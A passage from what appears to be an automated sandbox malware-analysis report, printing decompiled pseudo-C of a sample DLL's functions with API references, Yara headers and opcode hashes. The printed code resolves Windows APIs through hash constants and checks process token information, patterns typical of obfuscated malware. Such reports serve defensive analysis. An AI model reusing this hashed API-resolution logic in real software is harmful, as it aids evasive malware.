                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 2814608202-0
                                                                                                        • Opcode ID: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
                                                                                                        • Instruction ID: 2fbeded27e68232d4761793a93305a65ed398090529adc566c84143b026785df
                                                                                                        • Opcode Fuzzy Hash: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
                                                                                                        • Instruction Fuzzy Hash: D8F0C8B510430AAFE7259E6ACC54DB7BBFCDBC1B50F00851EA0D552240EA35EC50C9B0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E6E481030(void* __ecx) {
                                                                                                        				void* _v36;
                                                                                                        				void* _v44;
                                                                                                        				int _t15;
                                                                                                        				intOrPtr* _t21;
                                                                                                        				void* _t24;
                                                                                                        				intOrPtr* _t25;
                                                                                                        
                                                                                                        				_t24 = __ecx;
                                                                                                        				 *_t25 = 0;
                                                                                                        				_t21 = E6E48306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
                                                                                                        				if(_t21 == 0) {
                                                                                                        					L5:
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				_push(_t25);
                                                                                                        				_push(8);
                                                                                                        				_push(_t24);
                                                                                                        				if( *_t21() == 0 || E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
                                                                                                        					goto L5;
                                                                                                        				} else {
                                                                                                        					_t2 = _t25 + 8 - 4; // 0x150c05f8
                                                                                                        					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
                                                                                                        					if(_t15 == 0) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
                                                                                                        				}
                                                                                                        			}









                                                                                                        APIs
                                                                                                        • GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E481089
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationToken
                                                                                                        • String ID:
                                                                                                        • API String ID: 4114910276-0
                                                                                                        • Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
                                                                                                        • Instruction ID: 0db830e95f25f1894dbd9a359923be24de58c2e5b4b9a61ff6840f692a0eb3ae
                                                                                                        • Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
                                                                                                        • Instruction Fuzzy Hash: 9CF06270344643ABFA4195B89C68F7F33ED5BC2614F50883AB650CA794EF78C9498626
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 29%
                                                                                                        			E6E483628(void* __ecx) {
                                                                                                        				void* _t3;
                                                                                                        				intOrPtr* _t7;
                                                                                                        				void* _t9;
                                                                                                        
                                                                                                        				_t9 = __ecx;
                                                                                                        				if( *0x6e48d228 == 0xa33c83e5) {
                                                                                                        					_t7 = E6E483064(0x60a28c5c, 0x1c6ef387);
                                                                                                        					 *0x6e48d22c = E6E483064(0x60a28c5c, 0x5e0afaa3);
                                                                                                        					if( *0x6e48d228 == 0xa33c83e5) {
                                                                                                        						 *_t7(2, 0, 0, 0, 0, 0); // executed
                                                                                                        						 *0x6e48d228 = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t3 = E6E483064(0x60a28c5c, 0x45b68b68);
                                                                                                        				if(_t3 == 0) {
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_push(_t9);
                                                                                                        					_push(8);
                                                                                                        					_push( *0x6e48d228);
                                                                                                        					asm("int3");
                                                                                                        					asm("int3");
                                                                                                        					return _t3;
                                                                                                        				}
                                                                                                        			}






                                                                                                        APIs
                                                                                                        • RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E47DE09,?,?), ref: 6E483692
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 10892065-0
                                                                                                        • Opcode ID: 16e1111f5e9ba65141f37881f07fe1d90de8d7f7e42a10c232112ca1d74b14de
                                                                                                        • Instruction ID: 80a3e0914983e621a45540820c85a2ab416d0c6d6950ae4e00735e9fb2074c16
                                                                                                        • Opcode Fuzzy Hash: 16e1111f5e9ba65141f37881f07fe1d90de8d7f7e42a10c232112ca1d74b14de
                                                                                                        • Instruction Fuzzy Hash: 18F0B424156291BDEA7019FEAC08E539698EBA6655F000C3BF284B5204D7B4C441D675
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1053741780.0000000001180000.00000040.00000001.sdmp, Offset: 01180000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction ID: 795e1316934259b3e31ecb02cf3cced73342bdfaf97c821618cb520946636b9d
                                                                                                        • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction Fuzzy Hash: 1B4104B5E0521A9FDB08DF98D494AAEBBF0FF48314F15852DE849AB340D379A841CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        C-Code - Quality: 31%
                                                                                                        			E6E471494(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v60;
                                                                                                        				void* _v68;
                                                                                                        				char _v72;
                                                                                                        				char _v76;
                                                                                                        				char _v80;
                                                                                                        				char _v84;
                                                                                                        				char _v88;
                                                                                                        				char _v92;
                                                                                                        				char _v96;
                                                                                                        				char _v100;
                                                                                                        				char _v104;
                                                                                                        				char _v108;
                                                                                                        				char _v112;
                                                                                                        				char _v116;
                                                                                                        				char _v120;
                                                                                                        				char _v124;
                                                                                                        				char _v128;
                                                                                                        				char _v132;
                                                                                                        				char _v136;
                                                                                                        				char _v140;
                                                                                                        				char _v144;
                                                                                                        				char _v148;
                                                                                                        				char _v152;
                                                                                                        				char _v156;
                                                                                                        				char _v160;
                                                                                                        				char _v164;
                                                                                                        				char _v168;
                                                                                                        				char _v172;
                                                                                                        				char _v176;
                                                                                                        				char _v180;
                                                                                                        				char _v184;
                                                                                                        				char _v188;
                                                                                                        				char _v192;
                                                                                                        				char _v196;
                                                                                                        				char _v200;
                                                                                                        				char _v204;
                                                                                                        				char _v208;
                                                                                                        				char _v212;
                                                                                                        				char _v216;
                                                                                                        				char _v220;
                                                                                                        				char _v224;
                                                                                                        				char _v228;
                                                                                                        				char _v232;
                                                                                                        				char _v236;
                                                                                                        				char _v240;
                                                                                                        				char _v244;
                                                                                                        				char _v248;
                                                                                                        				char _v252;
                                                                                                        				char _v256;
                                                                                                        				char _v260;
                                                                                                        				char _v264;
                                                                                                        				char _v268;
                                                                                                        				char _v272;
                                                                                                        				char _v276;
                                                                                                        				void* _v288;
                                                                                                        				intOrPtr _v292;
                                                                                                        				char _v296;
                                                                                                        				char _v300;
                                                                                                        				char _v304;
                                                                                                        				char _v308;
                                                                                                        				char _v312;
                                                                                                        				char _v316;
                                                                                                        				char _v320;
                                                                                                        				char _v324;
                                                                                                        				char _v340;
                                                                                                        				char _v344;
                                                                                                        				char _v348;
                                                                                                        				char _v352;
                                                                                                        				char _v356;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t282;
                                                                                                        				intOrPtr* _t310;
                                                                                                        				intOrPtr* _t318;
                                                                                                        				intOrPtr* _t434;
                                                                                                        				intOrPtr* _t480;
                                                                                                        				void* _t481;
                                                                                                        
                                                                                                        				_t481 = __eflags;
                                                                                                        				_t480 =  &_v60;
                                                                                                        				_v40 = __ecx;
                                                                                                        				_v76 = 0;
                                                                                                        				E6E47F584( &_v72, 0);
                                                                                                        				_v60 = 0xe7942190;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v76, E6E47F4CC( &_v76) + 0x10);
                                                                                                        				E6E47F4BC( &_v80, E6E47F4CC( &_v80) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v88 = _v88 + 1;
                                                                                                        				_t325 =  &_v84;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v84, E6E47F4CC(_t325) + 0x10);
                                                                                                        				E6E47F4BC( &_v88, E6E47F4CC( &_v88) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v96 = _v96 + 1;
                                                                                                        				_t329 =  &_v92;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v92, E6E47F4CC(_t329) + 0x10);
                                                                                                        				E6E47F4BC( &_v96, E6E47F4CC( &_v96) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v104 = _v104 + 1;
                                                                                                        				_t333 =  &_v100;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v100, E6E47F4CC(_t333) + 0x10);
                                                                                                        				E6E47F4BC( &_v104, E6E47F4CC( &_v104) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v112 = _v112 + 1;
                                                                                                        				_t337 =  &_v108;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v108, E6E47F4CC(_t337) + 0x10);
                                                                                                        				E6E47F4BC( &_v112, E6E47F4CC( &_v112) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v120 = _v120 + 1;
                                                                                                        				_t341 =  &_v116;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v116, E6E47F4CC(_t341) + 0x10);
                                                                                                        				E6E47F4BC( &_v120, E6E47F4CC( &_v120) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v128 = _v128 + 1;
                                                                                                        				_t345 =  &_v124;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v124, E6E47F4CC(_t345) + 0x10);
                                                                                                        				E6E47F4BC( &_v128, E6E47F4CC( &_v128) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v136 = _v136 + 1;
                                                                                                        				_t349 =  &_v132;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v132, E6E47F4CC(_t349) + 0x10);
                                                                                                        				E6E47F4BC( &_v136, E6E47F4CC( &_v136) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v144 = _v144 + 1;
                                                                                                        				_t353 =  &_v140;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v140, E6E47F4CC(_t353) + 0x10);
                                                                                                        				E6E47F4BC( &_v144, E6E47F4CC( &_v144) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v152 = _v152 + 1;
                                                                                                        				_t357 =  &_v148;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v148, E6E47F4CC(_t357) + 0x10);
                                                                                                        				E6E47F4BC( &_v152, E6E47F4CC( &_v152) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v160 = _v160 + 1;
                                                                                                        				_t361 =  &_v156;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v156, E6E47F4CC(_t361) + 0x10);
                                                                                                        				E6E47F4BC( &_v160, E6E47F4CC( &_v160) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v168 = _v168 + 1;
                                                                                                        				_t365 =  &_v164;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v164, E6E47F4CC(_t365) + 0x10);
                                                                                                        				E6E47F4BC( &_v168, E6E47F4CC( &_v168) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v176 = _v176 + 1;
                                                                                                        				_t369 =  &_v172;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v172, E6E47F4CC(_t369) + 0x10);
                                                                                                        				E6E47F4BC( &_v176, E6E47F4CC( &_v176) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v184 = _v184 + 1;
                                                                                                        				_t373 =  &_v180;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v180, E6E47F4CC(_t373) + 0x10);
                                                                                                        				E6E47F4BC( &_v184, E6E47F4CC( &_v184) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v192 = _v192 + 1;
                                                                                                        				_t377 =  &_v188;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v188, E6E47F4CC(_t377) + 0x10);
                                                                                                        				E6E47F4BC( &_v192, E6E47F4CC( &_v192) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v200 = _v200 + 1;
                                                                                                        				_t381 =  &_v196;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v196, E6E47F4CC(_t381) + 0x10);
                                                                                                        				E6E47F4BC( &_v200, E6E47F4CC( &_v200) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v208 = _v208 + 1;
                                                                                                        				_t385 =  &_v204;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v204, E6E47F4CC(_t385) + 0x10);
                                                                                                        				E6E47F4BC( &_v208, E6E47F4CC( &_v208) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_t434 = _t480;
                                                                                                        				 *_t434 =  *_t434 + 1;
                                                                                                        				E6E484200(0x60a28c5c, _t434);
                                                                                                        				E6E47F4BC( &_v212, 0x10);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x450], xmm0");
                                                                                                        				E6E47F4BC( &_v216, 0x20);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x458], xmm0");
                                                                                                        				E6E47F4BC( &_v220, 0x30);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x460], xmm0");
                                                                                                        				E6E47F4BC( &_v224, 0x40);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x468], xmm0");
                                                                                                        				E6E47F4BC( &_v228, 0x50);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x470], xmm0");
                                                                                                        				E6E47F4BC( &_v232, 0x60);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x478], xmm0");
                                                                                                        				E6E47F4BC( &_v236, 0x70);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x480], xmm0");
                                                                                                        				E6E47F4BC( &_v240, 0x80);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x488], xmm0");
                                                                                                        				E6E47F4BC( &_v244, 0x90);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x490], xmm0");
                                                                                                        				E6E47F4BC( &_v248, 0xa0);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x498], xmm0");
                                                                                                        				E6E47F4BC( &_v252, 0xb0);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4a0], xmm0");
                                                                                                        				E6E47F4BC( &_v256, 0xc0);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4a8], xmm0");
                                                                                                        				E6E47F4BC( &_v260, 0xd0);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4b0], xmm0");
                                                                                                        				E6E47F4BC( &_v264, 0xe0);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4b8], xmm0");
                                                                                                        				E6E47F4BC( &_v268, 0xf0);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4c0], xmm0");
                                                                                                        				E6E47F4BC( &_v272, 0x100);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4c8], xmm0");
                                                                                                        				_t282 = E6E47F4BC( &_v276, 0);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [esp], xmm0");
                                                                                                        				_v252 = E6E471D2C(_v248, _t434, _t481, _t282, _t282);
                                                                                                        				_t318 = _t434;
                                                                                                        				E6E47B27C( &_v248, _v256, _t481, _v252, _t318);
                                                                                                        				E6E47F840( &_v296, _t481);
                                                                                                        				_v300 = 0;
                                                                                                        				_t410 =  &_v296;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v296, E6E47F4CC(_t410) + 0x10);
                                                                                                        				E6E47F4BC( &_v300, E6E47F4CC( &_v300) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v308 = _v308 + 1;
                                                                                                        				_t414 =  &_v304;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v304, E6E47F4CC(_t414) + 0x10);
                                                                                                        				E6E47F4BC( &_v308, E6E47F4CC( &_v308) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v316 = _v316 + 1;
                                                                                                        				_t418 =  &_v312;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v312, E6E47F4CC(_t418) + 0x10);
                                                                                                        				E6E47F4BC( &_v316, E6E47F4CC( &_v316) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				_v324 = _v324 + 1;
                                                                                                        				_t422 =  &_v320;
                                                                                                        				asm("pxor xmm0, xmm0");
                                                                                                        				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
                                                                                                        				asm("movq [ecx+0x18], xmm0");
                                                                                                        				E6E47F828( &_v320, E6E47F4CC(_t422) + 0x10);
                                                                                                        				E6E47F4BC( &_v324, E6E47F4CC( &_v324) + 0xfffffff0);
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				asm("movsd");
                                                                                                        				 *_t480 =  *_t480 + 1;
                                                                                                        				_t310 = _t480;
                                                                                                        				_push(_t310);
                                                                                                        				_push(_t318);
                                                                                                        				_push(_v292);
                                                                                                        				_t154 = _t310 + 0x2c; // 0x2c
                                                                                                        				E6E47B9FC(_t154,  *_t480);
                                                                                                        				E6E47F4BC( &_v340, 0);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4d8], xmm0");
                                                                                                        				E6E47F4BC( &_v344, 0x10);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4e0], xmm0");
                                                                                                        				E6E47F4BC( &_v348, 0x20);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4d0], xmm0");
                                                                                                        				E6E47F4BC( &_v352, 0x30);
                                                                                                        				asm("movq xmm0, [eax+0x8]");
                                                                                                        				asm("movq [ebp+0x4e8], xmm0");
                                                                                                        				E6E47F654( &_v316);
                                                                                                        				return E6E47F654( &_v356);
                                                                                                        			}

                                                                                                        0x6e471a5a
                                                                                                        0x6e471a62
                                                                                                        0x6e471a6c
                                                                                                        0x6e471a75
                                                                                                        0x6e471a7d
                                                                                                        0x6e471a87
                                                                                                        0x6e471a90
                                                                                                        0x6e471a98
                                                                                                        0x6e471aa2
                                                                                                        0x6e471aab
                                                                                                        0x6e471ab3
                                                                                                        0x6e471abd
                                                                                                        0x6e471ac6
                                                                                                        0x6e471ace
                                                                                                        0x6e471ad8
                                                                                                        0x6e471ae1
                                                                                                        0x6e471ae9
                                                                                                        0x6e471af3
                                                                                                        0x6e471afc
                                                                                                        0x6e471b04
                                                                                                        0x6e471b0e
                                                                                                        0x6e471b17
                                                                                                        0x6e471b1f
                                                                                                        0x6e471b26
                                                                                                        0x6e471b2f
                                                                                                        0x6e471b37
                                                                                                        0x6e471b3e
                                                                                                        0x6e471b43
                                                                                                        0x6e471b51
                                                                                                        0x6e471b55
                                                                                                        0x6e471b64
                                                                                                        0x6e471b6d
                                                                                                        0x6e471b72
                                                                                                        0x6e471b79
                                                                                                        0x6e471b7d
                                                                                                        0x6e471b81
                                                                                                        0x6e471b88
                                                                                                        0x6e471b9a
                                                                                                        0x6e471bb0
                                                                                                        0x6e471bbb
                                                                                                        0x6e471bbc
                                                                                                        0x6e471bbd
                                                                                                        0x6e471bbe
                                                                                                        0x6e471bbf
                                                                                                        0x6e471bc2
                                                                                                        0x6e471bc6
                                                                                                        0x6e471bca
                                                                                                        0x6e471bd1
                                                                                                        0x6e471be3
                                                                                                        0x6e471bf9
                                                                                                        0x6e471c04
                                                                                                        0x6e471c05
                                                                                                        0x6e471c06
                                                                                                        0x6e471c07
                                                                                                        0x6e471c08
                                                                                                        0x6e471c0b
                                                                                                        0x6e471c0f
                                                                                                        0x6e471c13
                                                                                                        0x6e471c1a
                                                                                                        0x6e471c2c
                                                                                                        0x6e471c42
                                                                                                        0x6e471c4d
                                                                                                        0x6e471c4e
                                                                                                        0x6e471c4f
                                                                                                        0x6e471c50
                                                                                                        0x6e471c51
                                                                                                        0x6e471c54
                                                                                                        0x6e471c58
                                                                                                        0x6e471c5c
                                                                                                        0x6e471c63
                                                                                                        0x6e471c75
                                                                                                        0x6e471c8b
                                                                                                        0x6e471c96
                                                                                                        0x6e471c97
                                                                                                        0x6e471c98
                                                                                                        0x6e471c99
                                                                                                        0x6e471c9a
                                                                                                        0x6e471c9d
                                                                                                        0x6e471ca0
                                                                                                        0x6e471ca1
                                                                                                        0x6e471ca2
                                                                                                        0x6e471ca9
                                                                                                        0x6e471cac
                                                                                                        0x6e471cb7
                                                                                                        0x6e471cbe
                                                                                                        0x6e471cc7
                                                                                                        0x6e471ccf
                                                                                                        0x6e471cd6
                                                                                                        0x6e471cdf
                                                                                                        0x6e471ce7
                                                                                                        0x6e471cee
                                                                                                        0x6e471cf7
                                                                                                        0x6e471cff
                                                                                                        0x6e471d04
                                                                                                        0x6e471d0d
                                                                                                        0x6e471d15
                                                                                                        0x6e471d2a

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8nsK
                                                                                                        • API String ID: 0-3012451157
                                                                                                        • Opcode ID: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
                                                                                                        • Instruction ID: e1c55d9591ecf8e7590ef669fc239753d3cc2ce03a86c13a7869252d1ec07354
